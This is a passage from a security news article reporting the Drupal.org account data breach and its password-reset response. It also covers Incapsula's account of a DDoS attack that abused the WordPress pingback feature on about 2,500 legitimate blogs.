
This access was accomplished via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.”

The Drupal data breach is considerably really serious about user's security, an impressive amount of web sites is based on the popular content management. The thousands of websites that run on Drupal software estimated at 2 percent of all sites should not be affected by the data breach.

The Drupal.org Security Team confirmed the “unauthorized access” to their system, highlighting that there’s no evidence that any information was actually stolen. As a precautionary measure was requested all users to reset their passwords at their next login attempt.

Holly Ross, Executive Director for Drupal Association confirmed that they are investigating on the incident that could have exposed also other info: “We are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly”

The attacks to Open Source CMS solutions are not an isolated cases due their large diffusion, in the past Joomla and WordPress platforms were hit and used to spread malicious code, WordPress recently was hit by a massive “brute-force” attack by botnet composed by almost 100,000 bots.

It's easy to predict that this kind of attacks is likely to increase for the large-diffusion of these platforms which makes them privileged targets.

Drupal.org account holders will be required to change their password by entering their username or e-mail address, and following the link included in the e-mail message that follows.

Distributed Denial of Service attacks have increased in scale, intensity and frequency. The wide range of motives for these attacks political , criminal, or social makes every merchant or organization with an online presence a potential target.

Over the weekend Incapsula mitigated a unique DDoS attack against a large gaming website, in which they have discovered a DDoS attack using thousands of legitimate WordPress blogs without the need for them to be compromised.

Incapsula released the list of approximately 2,500 WordPress sites from where the attack was originated, including some very large sites like Trendmicro.com, Gizmodo.it and Zendesk.com.

In a recent report, we posted about another method for DDoS attacks using DNS amplification, where a DNS request is made to an open DNS resolver with the source IP address forged so that it is the IP address of the targeted site to which the response is thus sent, but this new method uses HTTP rather than DNS.

The attack makes uses of a feature in the WordPress blogging platform called 'pingback', which allows the author of one blog to send a 'ping' to a post on another blog to notify the latter that it has been referenced. It turns out that most WordPress sites are susceptible to this abuse. Since this feature is enabled by default, and there is no protection mechanism within WordPress against it.

The Pingback mechanism has been known to be a security risk for some time. Late last year a similar vulnerability was discovered that could turn third party blogs into a powerful port-scanning engine. The vulnerability (CVE-2013-0235) was fixed in in Wordpress 3.5.1, by applying some filtering on allowed URLs.

However, in this case the requests do not appear to be amplified, which means the attackers would have to be able to control a large botnet in order for such attacks to be successful. Incapsula also added that all website using Incapsula are protected from such abuse.